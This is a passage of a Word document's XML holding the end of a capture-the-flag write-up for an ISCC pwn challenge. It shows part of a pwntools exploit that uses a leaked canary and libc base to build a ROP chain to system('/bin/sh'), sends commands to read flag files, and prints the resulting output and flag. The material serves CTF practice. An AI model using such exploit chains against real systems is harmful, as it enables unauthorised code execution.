        <w:t xml:space="preserve">%#x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 libc_base)</w:t>
      </w:r>
      <w:r>
        <w:br/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flat(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p64(canary),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b"B"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RET),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">       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POP_RDI),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">       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BIN_SH),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        p64(libc_base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libc.sym[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menu(p,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b"(id):"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"0"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b"Please enter the spell:"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p.sendline(payload)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    p.recvuntil(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"Transporting..."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p.sendline(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"cat flag; cat /flag; cat /flag*; cat /home/ctf/flag* 2&gt;/dev/null"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(p.recvrepeat(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).decode(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"latin-1"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"replace"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p.close()</w:t>
      </w:r>
      <w:r>
        <w:br/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exploit()</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:id="15" w:name="header-n37"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$ python3 solve.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] canary = 0x9507e80b2db9f00</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] unsorted fd = 0x7fe8ecffcbe0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] libc base = 0x7fe8ece10000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{ff9e0a07-1f89-44e9-a17c-838661b23dc3}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="16" w:name="header-n39"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{ff9e0a07-1f89-44e9-a17c-838661b23dc3}</w:t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2026-05-16T04:02:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-16T04:02:57Z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